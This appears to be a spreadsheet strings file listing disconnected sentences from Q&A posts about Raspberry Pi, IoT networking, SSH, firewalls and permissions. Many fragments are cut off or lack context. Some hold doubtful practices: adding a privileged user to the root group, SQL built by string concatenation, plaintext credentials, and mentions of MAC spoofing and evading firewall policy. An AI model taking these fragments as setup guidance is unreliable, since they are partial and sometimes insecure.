    <t>Judging from your given cluster info all your pods look well and I bet your service endpoints are also exposed properly.</t>
  </si>
  <si>
    <t>Though going forward I would create a privileged user and add that user to the root group with the setting /bin/false.</t>
  </si>
  <si>
    <t>Once you do that, be aware that anything on your network will be able to talk to your MQTT server; you should configure it with proper access controls if that's a problem for you.</t>
  </si>
  <si>
    <t>With all the above in place, you can then scp build/mySoftware root@myDevice:/usr/local/bin without the Access Denied message.</t>
  </si>
  <si>
    <t>The Token will then be granted (or not) according to the Authentication process and the Scopes granted for the given Client Id</t>
  </si>
  <si>
    <t>A Network Security Groups (NSG)  controls the network traffic to and from Azure resources in an Azure virtual network.</t>
  </si>
  <si>
    <t>SpamAssassin does nothing but mark the email as spam; it is up to the mail client to setup rules to filter the marked emails out.</t>
  </si>
  <si>
    <t>Validation is used to check data to make sure it fits whatever required specifications are set for it.</t>
  </si>
  <si>
    <t>When I try to SSH using my external IP, it just times out no matter which internal IP is port forwarded (ethernet or WiFi).</t>
  </si>
  <si>
    <t>In the  file you have :
As the &lt;password stored in pass variable&gt; variable is not set, execution will result setting PASS to nil.</t>
  </si>
  <si>
    <t>A common reason for spoofing one's mac address is avoiding user identification and tracking by a network administrator.</t>
  </si>
  <si>
    <t>This could also be true for wireless communication area where you will need multiple bits for purpose of modulation to achieve broadband transmission, instead of simple baseline transmission.</t>
  </si>
  <si>
    <t>For this reason, it's difficult to advise on what to do should you not have an established secure channel for completely recovering a compromised device remotely.</t>
  </si>
  <si>
    <t>| mail " + phone + "@vtext.com")
ssmtp.conf before running the program (I am leaving out all the comments):
root=postmaster
mailhub=mail
hostname=raspberrypi
ssmtp.conf after running the program:
root=postmaster
hostname=raspberrypi
AuthUser=myemailaddress@gmail.com
AuthPass=mypassword
FromLineOverride=YES
mailhub=smtp.gmail.com:587
UseSTARTTLS=YES</t>
  </si>
  <si>
    <t>I keep getting the error 
network error software caused connection abort 
I've already tried deleting previous keys in regedit, different computers, wiring directly to my laptop, triple checking that SSH is enabled on the Raspberry pi, but still no dice.</t>
  </si>
  <si>
    <t>Not officially supported, but you can install this unofficial build, open up a terminal on the Pi:
More information here
If it fails to install (authentication issues), you can force it with:</t>
  </si>
  <si>
    <t>Restricted Profiles are a  feature introduced in Android Jelly Bean 4.3 that enables you to give users of your applications improved control when sharing their tablet.</t>
  </si>
  <si>
    <t>can i :-
have a dedicated pc / or raspbeery pi running local server and connected to my wifi with static ip running 24/7 and yet it can automatically restart web server if power down and run server up again without need to enter password.</t>
  </si>
  <si>
    <t>WAFFLE is a native Windows Authentication Framework consisting of two C# and Java libraries that perform functions related to Windows authentication, supporting negotiate, ntlm and kerberos.</t>
  </si>
  <si>
    <t>SO I did this :
in my /etc/ppp/peers/fona :
Instead of
I put :
auth
user lmfr
name lycamobile 
and in my /etc/ppp/chap-secrets as well as in my etc/ppp/pap-secrets I put :  
But I have the following error when i do this : 
sudo pon fona
/usr/sbin/pppd: The remote system is required to authenticate itself
/usr/sbin/pppd: but I couldn't find any suitable secret (password) for it to use to do so
/usr/sbin/pppd: (None of the available passwords would let it use an IP address)
Does anyone knows how to fix this or another way to connect to Fona with APN authentication ?</t>
  </si>
  <si>
    <t>Senario that does not work
 - BLE Device is not pair or pair, does not matter
 - If my BLE device disconnect due to power loss or out of range and gets powered up or back in range the Pi will reconnect and throw:
'System.Exception' in mscorlib.ni.dll
There is no user session key for the specified logon session.</t>
  </si>
  <si>
    <t>Typed the following into an Admin level PowerShell:
net start WinRM
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 
PiName
This allowed Powershell access but no change to Remote Desktop
What should I try next?</t>
  </si>
  <si>
    <t>Then reading stdin you could be reading keystrokes from a user logged in remotely, using a locally connected serial terminal or a terminal emulator (possibly operated from a remote X server).</t>
  </si>
  <si>
    <t>I'd also consider using an I2C EEPROM to store a key, so that any compromise also requires the hardware not just the Lua/Flash, but even that is able to be "snooped" if the machine has physically been compromised, as I imagine could be the case by probing the circuit with a data scope.</t>
  </si>
  <si>
    <t>Another way (incase you can't access your routers Admin page) is to use Ngrok: https://ngrok.com/, this handles the proxy stuff, and will expose it via http or https..
A word of warning.. Exposing ports outside of your network opens you up for attack.</t>
  </si>
  <si>
    <t>Zero configuration networking (zeroconf) is a set of techniques that automatically creates a usable Internet Protocol (IP) network without manual operator intervention or special configuration servers.</t>
  </si>
  <si>
    <t>Volatile data are thread safe in 
C#
Java (5 and above)
Scala (depending on VM version)
Compilers ensure such semantics by emiting memory barrier instructions in the required order.</t>
  </si>
  <si>
    <t>Open Graph Permissions
Open Graph permissions allow your app to publish actions to the Open Graph and also to retrieve actions published by other apps.</t>
  </si>
  <si>
    <t>The ASP.NET IIS Registration Tool (Aspnet_regiis.exe) allows an administrator or installation program to easily update the script maps for an ASP.NET application to point to the ASP.NET ISAPI version that is associated with the tool.</t>
  </si>
  <si>
    <t>Peer Permissioning - node/peer permissioning using smart contracts, ensuring only known parties can join the network
Higher Performance - Quorum offers significantly higher performance than public geth
public repo : https://github.com/jpmorganchase/quorum</t>
  </si>
  <si>
    <t>Because permissions paradigms can change fairly drastically across operating systems and coding frameworks, setting appropriate permissions for users can be a daunting task that requires a great deal of knowledge about what kinds of access are both safe and necessary for a given task.</t>
  </si>
  <si>
    <t>When I run PowerShell as admin and execute the command "Enter-PSSession ComputerName xx.xxx.xx.xxCredential xx.xxx.xx.xx\Administrator", the authentication again fails with the message: "Enter-PSSession : Connecting to remote server xx.xxx.xx.xx failed with the following error message : Access is denied...."
I just verified that the Win 10 IoT Core build 10.0.16299.15 does not have this problem.</t>
  </si>
  <si>
    <t>Samples and documenation are available at http://ucwa.lync.com and demonstrate the core features including: querying contacts and groups, P2P and multi-party IM, online meeting scheduling, joining an online meeting, contact card (note/presence/location), phone audio, and anonymous meeting join.</t>
  </si>
  <si>
    <t>I have been trying to set up GrovePi to be coded with Node-Red, but am getting an error.</t>
  </si>
  <si>
    <t>I've already looked into aliases section where the bus nos.</t>
  </si>
  <si>
    <t>For updating firmware I have set authorization.</t>
  </si>
  <si>
    <t>I think that that should ensure that the device hasn't been "discovered" already by app so it wouldn't appear as a duplicate key.</t>
  </si>
  <si>
    <t>You need to set permissions on the file by:
sudo chmod 644 /etc/modprobe.d/raspi-blacklist.conf
Your file should now be there and ready to go.</t>
  </si>
  <si>
    <t>You need to forward your ports to a private IP that your raspberru PI has in order to access you device.</t>
  </si>
  <si>
    <t>I'm mentioning SOCRADES because it has a feature that can force network installation.</t>
  </si>
  <si>
    <t>The easiest way is probably to run Secure Copy (SCP) over SSH from python on NAS.</t>
  </si>
  <si>
    <t>Analyzer (optional): The Analyzer is used to uninstall programs of
which installation is not logged by the uninstaller.</t>
  </si>
  <si>
    <t>It allows supplying SSH password in command line, file, environment variable, etc.</t>
  </si>
  <si>
    <t>Nodes may be configured to retransmit the message in order to guarantee connectivity in the multipath environment of a residential house.</t>
  </si>
  <si>
    <t>Important: Please use greasemonkey only if you are running the Firefox browser and/or using the scriptish add-on.</t>
  </si>
  <si>
    <t>Install via NuGet: PM&gt; Install-Package SecuritySwitch
http://code.google.com/p/securityswitch/</t>
  </si>
  <si>
    <t>I am using a regular Integrated circuit multiplexer to handle which channel is patched to output.</t>
  </si>
  <si>
    <t>-I have done some research and it seems that the most common causes of this is a firewall or bad router.</t>
  </si>
  <si>
    <t>Now i was curious how much space I have used until now after installing all the packages I needed for a private dev server.</t>
  </si>
  <si>
    <t>If I try to access the value file from within my kivy app it crashes and says permissions denied (to be expected)
If I chmod 0666 to both the direction and value it sucessfully updates the permissions in the file sys.</t>
  </si>
  <si>
    <t>User 
My raspberry is behind a NAT, ports are forwarded correctly, ssh access works to user git, who is also running gitolite.</t>
  </si>
  <si>
    <t>Is there some sort of unique id backed into arduino that I can use to identify the remote arduino sensor node to the base station?</t>
  </si>
  <si>
    <t>The router and the coordinator are in the same room, so I don't think it's a signal strength issue.</t>
  </si>
  <si>
    <t>Sat Mar  1 08:19:54 2014: [....] Starting OpenBSD Secure Shell server: sshd^[[?25l^[[?1c^[7^[[1G[^[[32m ok ^[[39;49m^[8^[[?25h^[[?0c.</t>
  </si>
  <si>
    <t>I'm getting logs broken out by day for both my router and my firewall.</t>
  </si>
  <si>
    <t>I doubt that the packages installed by apt-get have some bugs.</t>
  </si>
  <si>
    <t>In this mask, the value 255
  indicates that the pasted image is opaque in that position (that is,
  the pasted image should be used as is).</t>
  </si>
  <si>
    <t>If this is the case, how might I configure firewall settings so that the right ports/IPs are available?</t>
  </si>
  <si>
    <t>I can't avoid it, so I want to have a watchdog program continually running to check whether the server has segfaulted, and if it has, restart it.</t>
  </si>
  <si>
    <t>I am working on a Raspberry Pi powered Bitcoin vending machine and I am having trouble finding a Python lib and syntax that I can use.</t>
  </si>
  <si>
    <t>I've done this numerous times before with an X11 display app installed locally on the mac ( in this case XQuartz ) and X11 forwarding enabeled on the raspberry pi, through SSH with X11 enabled.</t>
  </si>
  <si>
    <t>I have verified this by monitoring the receive flag on the remote device.</t>
  </si>
  <si>
    <t>This because we have a cron job checking to see if someone is trying to access the RPi from the server, and if so, maintaining a connection on port 8901.</t>
  </si>
  <si>
    <t>It works flawlessly to connect remotely from both my PC and from others in my house, but when I send the application to my friend, they get:
"Access denied for user "Admin2"----."</t>
  </si>
  <si>
    <t>I tried many ways , time is set correctly and have install ca-certificates, but I still have following error
!!!</t>
  </si>
  <si>
    <t>Of course the router have access to internet and from a computer connect to the router in wifi with the Curl command, the request work.</t>
  </si>
  <si>
    <t>Even if I set the my WLAN SSID and WLAN PASS, same corrupt message appears.</t>
  </si>
  <si>
    <t>I want to set up it without login and run node program on start up so there would not require any manual intervention.</t>
  </si>
  <si>
    <t>hence i use AudioTrack object but when i doing screen lock some device loss the audio.</t>
  </si>
  <si>
    <t>EDIT: At the AP configuration I added the auth parameter set to 3, I am pasting a part of my code below.</t>
  </si>
  <si>
    <t>This may be because a firewall is preventing communication to the remote computer.</t>
  </si>
  <si>
    <t>Just stopping the internet access of RasPi so no external IPs can be reached.</t>
  </si>
  <si>
    <t>If any other charger try to charge the mobile an app installed in that mobile considers this an event of theft and provides alert.</t>
  </si>
  <si>
    <t>Normal operation requires entering access code using keypad which is working fine.</t>
  </si>
  <si>
    <t>I read this for passwordless ssh access https://www.raspberrypi.org/documentation/remote-access/ssh/passwordless.md 
but here also it asks to at least once access raspberry pi using the password.</t>
  </si>
  <si>
    <t>It would also be helpful if I could cause the Pi to remain discoverable until a connection is established via bluetooth.</t>
  </si>
  <si>
    <t>Here's the command: 
$userDB-&gt;exec("UPDATE user SET passwort = '".$password.</t>
  </si>
  <si>
    <t>Which spy knows how to find out where I can get/install the required PkgBldr.Tool.dll.</t>
  </si>
  <si>
    <t>After running manually via ssh
the update process fails with a configuration error of python2.7-minimal.</t>
  </si>
  <si>
    <t>Here is all the code I'm trying to use:
Arduino Code
Controller Code on Laptop
I'm pretty sure this isn't a permissions problem, I've run the controller code from root and the tty device opens fine.</t>
  </si>
  <si>
    <t>I'm wondering if there's any way to restrict the device's permissions to create-only in the Azure portal or via PowerShell.</t>
  </si>
  <si>
    <t>In other words, if scanner 1 had a barcode that was valid and scanner 2 had a barcode that was invalid, I want NeoPixel Ring 1 to be green and NeoPixel Ring 2 to be blue.</t>
  </si>
  <si>
    <t>Connection request was rejected by the remote debugger.</t>
  </si>
  <si>
    <t>But when I want to access to , I enter my login and then SETTING UP YOUR ENVIRONMENT start charging.</t>
  </si>
  <si>
    <t>Using non-embedded credentials the error is not appearing and the exact same code is working perfectly fine.</t>
  </si>
  <si>
    <t>Now I connected my raspberry pi to my router and registered a name on DtDNS and connected my router to it so my dynamic IP is updated automatically.</t>
  </si>
  <si>
    <t>I have  tried this code  in Spyder IDE in windows and it was working fine but now  i am  facing the error for the same in raspberry pi inbuilt python IDE.</t>
  </si>
  <si>
    <t>Everything works perfectly at this point, however, it's not feasible to have 4 separate SSH connections to the machine.</t>
  </si>
  <si>
    <t>It seems that the hub does take notice of the filter but and authentication succeeds but access is denied anyway.</t>
  </si>
  <si>
    <t>Because I thought there was a problem with my firewall I tried to connect via the  mobile hotspot network of my phone; it brought the same error.</t>
  </si>
  <si>
    <t>I tried disabling Firewall on Windows for a brief period while I tested and that didn't help either.</t>
  </si>
  <si>
    <t>Inside the Try section, when a person is being recognized or unknown it publishes really fine every 3 secs.</t>
  </si>
  <si>
    <t>When we look at the IP-addresses that the device it trying to access they are all Microsoft addresses and most of them are related to windows update.</t>
  </si>
  <si>
    <t>When we want to configure a new HomeKit device to connect to our Wi-Fi, we must perform the following steps:
Plug in the new device.</t>
  </si>
  <si>
    <t>This may be because a firewall
  is preventing communication to the remote computer.</t>
  </si>
  <si>
    <t>man 3posix select
man 2 select
man 2 select_tut
Update: The gpio is exposed in the sysfs gpio block.</t>
  </si>
  <si>
    <t>Also i tried using purge command to uninstall like below:
apt-get purge postgresql
I still getting permission denied message.</t>
  </si>
  <si>
    <t>After the first player turn an IOException : Access is Denied occurs?.</t>
  </si>
  <si>
    <t>(This code runs in the loop() function)
But this brute-force method severely restricts me in recognising more complex gestures.</t>
  </si>
  <si>
    <t>There is no firewall or security settings applicable based on the system configuration.</t>
  </si>
  <si>
    <t>Its getting "access denied" on all COM ports, tried almost all changing COM 1,2,34,5not working at all10 times restarted system.</t>
  </si>
  <si>
    <t>It works on 1 of the tablets, which has a security patch level of June 1, 2018, but for the tablet that isn't working it has a security patch level of December 1, 2018.</t>
  </si>
  <si>
    <t>So this is why I think our firewall is blocking MQTT traffic over port 8883.</t>
  </si>
  <si>
    <t>I am looking for a functionality to protect "C:" drive through Unified Write Filter.</t>
  </si>
  <si>
    <t>I wanted to know how i can set a password on my raspberry pi
I have looked on the internet and found that i need "sudo" to access the database locally on the raspberry pi.</t>
  </si>
  <si>
    <t>After these two minutes, the Coordinator will be locked and will not accept more joins.</t>
  </si>
  <si>
    <t>Debugging user mode code is trivial
A bug in your filter driver will crash the operating system.</t>
  </si>
  <si>
    <t>PHP is probably configured to run in safe mode in your website configuration.</t>
  </si>
  <si>
    <t>If using TCP, you could keep a connection open (which might be important if you have firewalls to deal with).</t>
  </si>
  <si>
    <t>Raspi) that have significantly more horse power and that offer a USB Bus for conncting devices.</t>
  </si>
  <si>
    <t>One possibility is that the systems rootfs has been corrupted, this happened to me once with unsafe powerdown on a raspi.</t>
  </si>
  <si>
    <t>Using an arduino would not help, and i highly doubt it has the processing power that you would need even without the security protocols.</t>
  </si>
  <si>
    <t>You first upload the code without the bluetooth wired and then wire the bluetooth.</t>
  </si>
  <si>
    <t>This could be "remedied" by filtering his packets using iptables so he doesn't get an IP anymore and thus is highly likely to not try and connect again.</t>
  </si>
  <si>
    <t>Well it turns out that I did meed to add permission for user "www-data" to have access to my external drives.</t>
  </si>
  <si>
    <t>I'm not certain what your exact set up is, but it sounds to me like you want to set up an SSH key on your server.</t>
  </si>
  <si>
    <t>I solved it by talking to the Network Administrator and we have saved my Arduino as a privileged device.</t>
  </si>
  <si>
    <t>If it isn't possible to obtain an automated ip.. you can ask the network administrator for free ip sections to us on the network.</t>
  </si>
  <si>
    <t>The funny thing is that the mongo-db installation took so long that my ssh client denied the connection.</t>
  </si>
  <si>
    <t>It's best to configure MySQL that it allows remote connection.</t>
  </si>
  <si>
    <t>You can probably use the RPi GPIO headers's 3.3V supply pin to power the ACM220, then you will be sure to be safe.</t>
  </si>
  <si>
    <t>If you didn't set explicitly  and auth_domain options, authentication is based on .htpasswd in the path you are trying to access.</t>
  </si>
  <si>
    <t>If you cannot access the router configuration and you are on a private network then there is no way to access it from outside except if your raspberry py contact the client in first place.</t>
  </si>
  <si>
    <t>You can "whitelist" your device by configuring the BLE chip using AT commands.</t>
  </si>
  <si>
    <t xml:space="preserve">
In order to avoid having to stay SSH'd into the system, when you start up the command, run .</t>
  </si>
  <si>
    <t>When you're accessing it remotely, you're not using , you'd be using a public IP address or external hostname.</t>
  </si>
  <si>
    <t>like:
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80</t>
  </si>
  <si>
    <t>Also, as you have a second wireless router in your network (that is probably itself running NAT), you must also have port forwarding setup on that as well.</t>
  </si>
  <si>
    <t>Should be straight forward,  and see whether that's working  
install some network/packet sniffer, e.g.</t>
  </si>
  <si>
    <t>You can sign your deployment with the extended certificate, issue updates, and it will work fine.</t>
  </si>
  <si>
    <t>To open up a port:
Connect to your device in powershell
Open up the firewall with:</t>
  </si>
  <si>
    <t>Now add another printf in the middle of the remaining suspicious code and repeat.</t>
  </si>
  <si>
    <t>I'd look it up but I'm behind a firewall right now :)
You don't mention which environment you are using, but I'm guessing Arduino based.</t>
  </si>
  <si>
    <t>Some code in this folder provide the abilities for the computer to restart, power-off, and suspend.</t>
  </si>
  <si>
    <t>The quickest way (without any extra installation) of accessing your RPi is by ssh and run a command that will trigger something to your social media...</t>
  </si>
  <si>
    <t>Once you success to upload with usb + external power then you can upload any firmware with usb cable only.</t>
  </si>
  <si>
    <t>In my router, I can set fixed IP Adresses for devices identified by the MAC Number of each device.</t>
  </si>
  <si>
    <t>Also, you can choose permissions to add or remove users that have permission for remote debugging.</t>
  </si>
  <si>
    <t>Anyway, if you want to keep away from receiving unwanted messages from IoT Hub, there's some workaround you can try for now.</t>
  </si>
  <si>
    <t>(Network Connectivity)
The biggest hurdle you may come across is how to find the IP address of the machine.</t>
  </si>
  <si>
    <t>Rebooting the device after the app is installed will grant the new permissions in your app manifest.</t>
  </si>
  <si>
    <t>Or even use two laptops just to confirm connectivity between two WiFi clients on network.</t>
  </si>
  <si>
    <t>The 36kHz carrier frequency was chosen to render the system immune to interference from TV scan lines.</t>
  </si>
  <si>
    <t>Enter the command sudo lsusb
If the printer has been detected by the Linux environment then either /dev/ap1400 or /dev/pipsta should exist in the filesystem.</t>
  </si>
  <si>
    <t>Your protocols chosen basically ensure that no data is lost.</t>
  </si>
  <si>
    <t>Also try to turn off the firewall to verify if it does not interfere with the connection.</t>
  </si>
  <si>
    <t>On your raspi you will need the following services:
DNS server
DHCP server
IP redirection
webserver
DNS server and DHCP server
An easy to configure software is .</t>
  </si>
  <si>
    <t>On top of this you will need to enable kernel/iptables setting to allow IP forwarding.</t>
  </si>
  <si>
    <t>So its not easy today to get an alert if one among many, globally dispersed devices, loses connectivity.</t>
  </si>
  <si>
    <t>And now about the codeHow do I settle the certificates and which format since in powershell talk about chained key and everything but it doesn't specify what it demands.</t>
  </si>
  <si>
    <t>The keys can be generated on the Linux side and copied to the Windows, location is the same as in the Linux (/.ssh).</t>
  </si>
  <si>
    <t>See https://aws.amazon.com/blogs/iot/aws-iot-core-ats-endpoints/:
You must explicitly request an Amazon Trust Services endpoint for each region in your account.</t>
  </si>
  <si>
    <t>It's not the account's personal endpoint, but the Thing's endpoint.</t>
  </si>
  <si>
    <t>Just find a solution for myself, by using SCP (Secure Copy)</t>
  </si>
  <si>
    <t>The problem arises when you create certificate with Windows Powershell.</t>
  </si>
  <si>
    <t>Copy DISPLAY, XAUTHORITY and anything else that looks likely into your remote debug session.</t>
  </si>
  <si>
    <t>The limited documentation that is there says
https://www.twilio.com/docs/wireless/trust-onboard
Available Key certificates will be on the SIM card but the text is freely available on the device.</t>
  </si>
  <si>
    <t>The feature set is exposed through Microsoft Test Manager.</t>
  </si>
  <si>
    <t>Remote access is the connection to a data processing system from a remote location.</t>
  </si>
  <si>
    <t>An HID card is a card with a chip in it used in security systems to grant or deny access through certain check-points</t>
  </si>
  <si>
    <t>A whitelist is a list of entities that have been authorized for some access or action.</t>
  </si>
  <si>
    <t>It enables transparent filtering of network traffic passing through a Linux bridge.</t>
  </si>
  <si>
    <t>The Snowball Analyzer is ElasticSearch analyzer of type snowball that uses the standard tokenizer, with standard filter, lowercase filter, stop filter, and snowball filter.</t>
  </si>
  <si>
    <t>Django-rest-auth provides a set of REST API endpoints for Authentication and Registration</t>
  </si>
  <si>
    <t>allow-modals is a flag that can be set on the sandbox attribute of an iframe to allow modals (like alert and confirm) to break out of the iframe.</t>
  </si>
  <si>
    <t>It allows clients to perform authentication and accounting by means of network requests to remote servers.</t>
  </si>
  <si>
    <t>The wumpus world is a simple test environment for intelligent agents.</t>
  </si>
  <si>
    <t>IIS Express is the developer version of full IIS that doesn't require Administrator rights to run.</t>
  </si>
  <si>
    <t>The python package for scraping pypi endpoints to retrieve python package information.</t>
  </si>
  <si>
    <t>Questions referring to the firewall that comes built-in with windows.</t>
  </si>
  <si>
    <t>The Device Administration API for Android 2.2 and later allows applications to enforce security policies by requiring a password or encryption, and to lock or wipe the device programmatically.</t>
  </si>
  <si>
    <t>Windows Filtering Platform (WFP) - API for creating network filtering applications.</t>
  </si>
  <si>
    <t>Publicly shared files do not require a Windows Live ID to access.</t>
  </si>
  <si>
    <t>An HID card is a card with a chip in it used in security systems to grant or deny access through certain check-points.</t>
  </si>
  <si>
    <t>Access to files is possible through a directory object but is also restricted by any operating system privileges.</t>
  </si>
  <si>
    <t>Traffic selection is done using the ipfw firewall, which is the main user interface for dummynet.</t>
  </si>
  <si>
    <t>Mobile robots are also found in industry, military and security environments.</t>
  </si>
  <si>
    <t>The crypt(3) function should not be confused with the Unix command line utility crypt(1), which is an obsolete and insecure file encryption utility.</t>
  </si>
  <si>
    <t>May be associated with
email: "unknown sender" or "action not permitted".</t>
  </si>
  <si>
    <t>Reverse proxy mode to forward traffic to a specified server.</t>
  </si>
  <si>
    <t>A location can be a file system location, such as a directory, or a location exposed by a different Windows PowerShell provider, such as a registry hive or a certificate store.</t>
  </si>
  <si>
    <t>Important: You must code sign your app in order to get information back from the iTunes Library framework.</t>
  </si>
  <si>
    <t>grunt-ssh provides two grunt tasks for SSH
sftp
Copies files to a remote server over SSH.</t>
  </si>
  <si>
    <t>It is also advisable to include the spotify tag as well, to ensure wider visibility.</t>
  </si>
  <si>
    <t>If the user has devices registered with their Google account then applications can be queued for installation on that device from other web browsers.</t>
  </si>
  <si>
    <t>The first time an application in a remote application domain accesses a MarshalByRefObject, a proxy is passed to the remote application.</t>
  </si>
  <si>
    <t>SQL Server Profiler also supports auditing the actions performed on instances of SQL Server.</t>
  </si>
  <si>
    <t>You can quickly issue queries against your own data, or against a sandboxed environment.</t>
  </si>
  <si>
    <t>e-token usually comes with the required drivers that needs to be installed in the system or the can be downloaded from the e-token provider.</t>
  </si>
  <si>
    <t>It was introduced by the WiFi alliance in 2006, and usually has a button on the router that is pressed in order to allow a device to connect.</t>
  </si>
  <si>
    <t>Cyrus IMAP's spool format resides in parts of the filesystem that are private to the Cyrus IMAP system.</t>
  </si>
  <si>
    <t>You can download your app code and the required credentials and initializers if the services are configured into your project.</t>
  </si>
  <si>
    <t>Facebook or Google) for all your applications in one central place, with the power to control who can access your API and the information that is exposed to each client.</t>
  </si>
  <si>
    <t>External Links
Git Tools - Signing Your Work</t>
  </si>
  <si>
    <t>If you have administrator rights on a Debian/Ubuntu server, and SSH is not already available (see your phpinfo) it can usually be installed by executing: .</t>
  </si>
  <si>
    <t>For further reading, see Remote Debugging Android Devices at Google Developers.</t>
  </si>
  <si>
    <t>HttpFS can be used to access data in HDFS on a cluster behind of a firewall (the HttpFS server acts as a gateway and is the only system that is allowed to cross the firewall into the cluster).</t>
  </si>
  <si>
    <t>The WebUSB API provides a way to safely expose USB device services to the web.</t>
  </si>
  <si>
    <t>Safety: Fine-grained whitelist with method call/field granularity.</t>
  </si>
  <si>
    <t>This API requires the permission , which is a system-level permission and will not be granted to third-party apps.</t>
  </si>
  <si>
    <t>IIS Express is the developer version of full IIS, that doesn't require Administrator rights to run.</t>
  </si>
  <si>
    <t>Individuals may need to know about drivers in order to gain access to a particular device that is of interest to them.</t>
  </si>
  <si>
    <t>The following example sets (probably in an unexpected way) full permissions for the world and no permissions for the user or group:
chmod 7 x.sh
cat x.sh
cat: x.sh: Permission denied</t>
  </si>
  <si>
    <t xml:space="preserve"> is an HTTP server toolkit that can be configured as an HTTPS server, a proxy server, and a virtual-host server.</t>
  </si>
  <si>
    <t>Linux, in particular, exposes information about mounted filesystems, network status, connected devices and more.</t>
  </si>
  <si>
    <t>I'm a Room Owner of SOCVR, a chat room focused on site moderation.</t>
  </si>
  <si>
    <t>An example would be:
When I use my home IP in the variable 'ipaddy' it works fine, when I use my external IP (in the form username:password@ipaddress:port ) it does nothing.</t>
  </si>
  <si>
    <t>Some network environments, however, require that these
# settings are disabled so review and enable them as needed.</t>
  </si>
  <si>
    <t>However I wanted to be able to log into other wifi  channels so I put wifiManager.h, ESP8266WiFi.h, DNSServer.h, and ESP8266WebServer.h on my ESP8266 and everything worked fine.</t>
  </si>
  <si>
    <t>You will need to buy a domain and set your home's public IP as the server address.</t>
  </si>
  <si>
    <t>CLIENT_SECRETS = '/home/blahblahblah/client_secrets.json'
Then it all works fine - calling it from another folder and it starting on startup.</t>
  </si>
  <si>
    <t>I don't know if pulseaudio looks at the username in order to find configuration files, or it looks at the $HOME variable.</t>
  </si>
  <si>
    <t>There are two parts to the solution: your scripts have to know which environment they are acting on, and they have to have authorization to interact with that environment.</t>
  </si>
  <si>
    <t>Dan, Try to check if there is connectivity to the Raspberry Pi first, by pinging both by name and by IP address, this would give you an idea if the desktop is able to talk to the RP or not.</t>
  </si>
  <si>
    <t>Once your serial cable is installed properly and recognized by Windows, you should be able to connect to your Pi as instructed.</t>
  </si>
  <si>
    <t>Like CGI, FastCGI runs applications in processes isolated from the core Web server, which provides greater security than APIs.</t>
  </si>
  <si>
    <t>Update 3
After finding this helpful post i seem to have discovered a possible solution with no reset hacking needed to the Arduino.</t>
  </si>
  <si>
    <t>Others suggest that it requires rooting the phone, which I'm afraid is probably beyond my comfort level and skill set.</t>
  </si>
  <si>
    <t>And the same idea for debugging, when I hit F5 it starts debugging mode as root.</t>
  </si>
  <si>
    <t>Maybe some part of the system has a poor power supply and the final 3 bits are not being detected properly.</t>
  </si>
  <si>
    <t>Your host has some sort of protection (maybe against bots), that expects a  cookie set by JavaScript, if not present.</t>
  </si>
  <si>
    <t>In the manual of python-xbee, it mentioned that "... Make sure that updates to external state are thread-safe...".</t>
  </si>
  <si>
    <t>The most important part of this that I couldn't find anywhere else (a friend had figured it out and let me in on the secret) is the Data section below.</t>
  </si>
  <si>
    <t>As you said, it is impossible to automate actions for System Dialog which is prompted for getting admin privileges.</t>
  </si>
  <si>
    <t>The Remote Network Driver Interface Specification (RNDIS) is a Microsoft proprietary protocol that provides a virtual Ethernet link over PnP buses such as USB, 1394, Bluetooth, and InfiniBand.</t>
  </si>
  <si>
    <t>and there are unsupported implementations for WiFi-Direct and bluetooth (Bluez stack with root permission needed).</t>
  </si>
  <si>
    <t>Input masking restricts inputs for a given UI element without actually performing validation.</t>
  </si>
  <si>
    <t>Given that Internet protocols are quite clear, it often means that one or both machines have been incorrectly or incompletely programmed.</t>
  </si>
  <si>
    <t>Realtor agents are required to comply with MLS publication rules, in order to protect any copyrighted information contained in the IDX data.</t>
  </si>
  <si>
    <t>Or, you can leverage the sudo mechanism, where you can allow users to execute programs as root with some fine grained control.</t>
  </si>
  <si>
    <t>This results in undefined behaviour, meaning that it might crash, it might appear to work, or it might allow an attacker to gain control of your machine.</t>
  </si>
  <si>
    <t>It is worth noting for anybody not aware that apt purge will completely uninstall a package, including configuration files.</t>
  </si>
  <si>
    <t>Recently, regular expression hardware acceleration has been gaining popularity in the server industry, owing to very noticeable speed ups in spam control.</t>
  </si>
  <si>
    <t>And the reason why i didnt see the barcode scanner inputs was because via SSH the Standard input(STDIN) is my laptop, not the Raspi pheripherial devices (IE.</t>
  </si>
  <si>
    <t>Documentation at MSDN of the UWF_Filter class states:
You must use an administrator account to make any changes to the configuration settings for UWF.</t>
  </si>
  <si>
    <t>If I use curl or Postman to make the request its working fine, the ESP32 receive WiFi credentials and connect to my router, but it has been impossible to me to make the same with the vue web app...</t>
  </si>
  <si>
    <t>But you have to keep in mind that whatever you give to users (potential attackers) is lost and you can safely assume they have full control.</t>
  </si>
  <si>
    <t>After creating an IoT hub in your subscription and registering your device in the service it will have an endpoint for a message queue which you can target to communicate with the bot.</t>
  </si>
  <si>
    <t>Multidrop buses are used by vending machine controllers to communicate with the vending machine's components, such as a currency detector (coin or note reader).</t>
  </si>
  <si>
    <t>If the firewall policy does not specifically exclude this kind of "wrapping", this trick can function to get around the intended firewall policy.</t>
  </si>
  <si>
    <t>Policy settings can be used to determine security constraints, system and application behaviors, startup and shutdown procedures and much else in the Microsoft Windows network and operating system.</t>
  </si>
  <si>
    <t>The unwind-protect construct is essential whenever you temporarily put a data structure in an inconsistent state; it permits you to make the data consistent again in the event of an error or throw.</t>
  </si>
  <si>
    <t>As suggested I used http with the following configuration:
The network configuration has been defined as follows:
I checked these values for correctness on my local PC, see:
nmcli dev list iface eth0 | grep IP4
IP4.ADDRESS[1]:                         ip = 192.168.2.102/24, gw = 192.168.2.1
IP4.DNS[1]:                             192.168.2.1
IP4.DOMAIN[1]:                          Speedport_W_504V_Typ_A
My network setup is as follows:
Internet ----- DSL Router (192.168.2.1.)</t>
  </si>
  <si>
    <t>All objects fetched from an external store are registered in a context together with a global identifier (an instance of NSManagedObjectID) thats used to uniquely identify each object to the external store.</t>
  </si>
  <si>
    <t>You can also map network drives via New-PSDrive, but that requires a bit more code:
$pw   = ConvertTo-SecureString -String 'password' -AsPlainText -Force
$cred = New-Object Management.Automation.PSCredential ('username', $pw)
New-PSDrive -Name X -PSProvider FileSystem -Root '\\192.168.23.42\share' -Credential $cred -Persist | Out-Null
robocopy C:\some\folder X:\ /s
Remove-PSDrive -Name X
If your credentials are not for SMB but for SSH access you could use the WinSCP .Net assembly.</t>
  </si>
  <si>
    <t>I want to send this information:
Station ID "In case the node does not exist in the database, it will then add it to the corresponding station"
Node ID "To know which node in the database to store the data at"
